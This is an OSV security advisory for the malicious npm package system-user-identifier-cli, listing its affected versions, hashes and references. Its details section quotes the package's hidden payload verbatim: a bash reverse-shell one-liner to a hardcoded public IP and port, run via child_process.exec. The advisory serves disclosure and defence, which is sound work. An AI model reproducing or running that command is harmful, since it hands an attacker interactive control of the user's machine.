MAL-2026-4679
See a problem?- Import Source
- https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/system-user-identifier-cli/MAL-2026-4679.json
- JSON Data
- https://api.osv.dev/v1/vulns/MAL-2026-4679
- Published
- 2026-05-25T03:45:35Z
- Modified
- 2026-05-26T06:02:57.397982047Z
- Summary
- Malicious code in system-user-identifier-cli (npm)
- Details
-
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (4da2798716abd83143a0a2e2b3e5064e2f2a1ac0a63633a70c42881330f52be8)
index.js line 13 executes
bash -c "bash -i >& /dev/tcp/101.43.232.7/7777 0>&1"via child_process.exec, opening an interactive reverse shell to the hardcoded attacker-controlled host 101.43.232.7 on TCP port 7777. The shell fires whenever the package's entrypoint is invoked (e.g.npx system-user-identifier-clior require of the module), giving the operator of that endpoint full interactive control of the installer's machine under the user that ran the tool. The package advertises itself as a trivial 'check system user identifier' utility and ships placeholder author metadata ('Your Name'); the reverse shell is undocumented and inconsistent with the stated purpose. There is no benign interpretation of a hardcoded/dev/tcp/<ip>/<port>bash redirector pointed at an arbitrary public IP. - Database specific
{ "malicious-packages-origins": [ { "id": "IN-MAL-2026-004574", "versions": [ "3.0.0" ], "sha256": "42d50bd01032d74eb793dda2457b06af253c79003f5b50d0e2979880698ab065", "source": "amazon-inspector", "modified_time": "2026-05-25T03:45:38Z", "import_time": "2026-05-26T05:52:52.148466059Z" }, { "id": "IN-MAL-2026-004591", "versions": [ "7.0.1" ], "sha256": "4da2798716abd83143a0a2e2b3e5064e2f2a1ac0a63633a70c42881330f52be8", "source": "amazon-inspector", "modified_time": "2026-05-25T06:36:21Z", "import_time": "2026-05-26T05:52:54.130536263Z" }, { "id": "IN-MAL-2026-004578", "import_time": "2026-05-26T05:52:52.605895842Z", "sha256": "4f2b4c5d80f52f89845a4391b512fad3c089995c0594ca911b6d31d569820e8c", "source": "amazon-inspector", "modified_time": "2026-05-25T04:06:25Z", "versions": [ "6.0.0" ] }, { "id": "IN-MAL-2026-004573", "versions": [ "2.0.0" ], "sha256": "7f1037c433664bc87feded0df6ed7f751d2ea6c22ec88ef2aa2a039a9e85783e", "source": "amazon-inspector", "modified_time": "2026-05-25T03:45:35Z", "import_time": "2026-05-26T05:52:52.030949669Z" }, { "id": "IN-MAL-2026-004575", "import_time": "2026-05-26T05:52:52.254069541Z", "sha256": "83964970fb7996dfdeaed0e9c48b09642bbee83d429b196d8ef819468c847c08", "source": "amazon-inspector", "modified_time": "2026-05-25T03:50:27Z", "versions": [ "4.0.0" ] }, { "id": "IN-MAL-2026-004590", "versions": [ "7.0.0" ], "sha256": "a9a27bcdd265fbec58b0e52a3bd28d83906d5b14a2fd1d7e1147b9ef53398676", "source": "amazon-inspector", "modified_time": "2026-05-25T06:34:36Z", "import_time": "2026-05-26T05:52:54.020037755Z" }, { "id": "IN-MAL-2026-004577", "import_time": "2026-05-26T05:52:52.489170502Z", "sha256": "abcc89501c7e97df9031fc62642ea0e78dde0131d38b85b6b6a995c6e8dec2ec", "source": "amazon-inspector", "modified_time": "2026-05-25T03:56:20Z", "versions": [ "5.0.0" ] } ] }- References
-
- https://www.npmjs.com/package/system-user-identifier-cli/v/3.0.0
- https://www.npmjs.com/package/system-user-identifier-cli/v/7.0.1
- https://www.npmjs.com/package/system-user-identifier-cli/v/6.0.0
- https://www.npmjs.com/package/system-user-identifier-cli/v/2.0.0
- https://www.npmjs.com/package/system-user-identifier-cli/v/4.0.0
- https://www.npmjs.com/package/system-user-identifier-cli/v/7.0.0
- https://www.npmjs.com/package/system-user-identifier-cli/v/5.0.0
- Credits
-
-
- Amazon Inspector - FINDER
-
Affected packages
npm / system-user-identifier-cli
Package
- Name
- system-user-identifier-cli
- View open source insights on deps.dev
- Purl
- pkg:npm/system-user-identifier-cli
Database specific
cwes
[
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
}
]
indicators
{
"evidence_files": [
{
"path": "index.js",
"sha256": "01358997508aa66db8dc966dbf8341f8d8c000f5b846b7cacfb3491c5821b56e",
"tlsh": "47f02da80bf8ae79337848e6ad47512319a3f8003112f498e2ee8e5a83c48440608977"
},
{
"path": "package.json",
"sha256": "fab5b7ba469ef62cc886cbc5307ee8a0d441f32f101423288a11ae59a3fda5d7",
"tlsh": "c0e068248670097320c66326ac59d425b321ee2b09043c0837ff205c974d63725fbbbc"
}
],
"package_integrity": [
{
"filename": "system-user-identifier-cli-3.0.0.tgz",
"hashes": {
"sha512_sri": "sha512-ecJgDJbJ49PkP5Yv5xnUXnsU5nqK9OyWk5y0xaYYXpaJ8rH3A1oijGTFHEhpSu0uH1ERkJMpL9gtUpcSr+WArA==",
"sha1": "ce246c5fc86357d0f683b76e897db17d2e2fb82b"
}
}
]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/system-user-identifier-cli/MAL-2026-4679.json"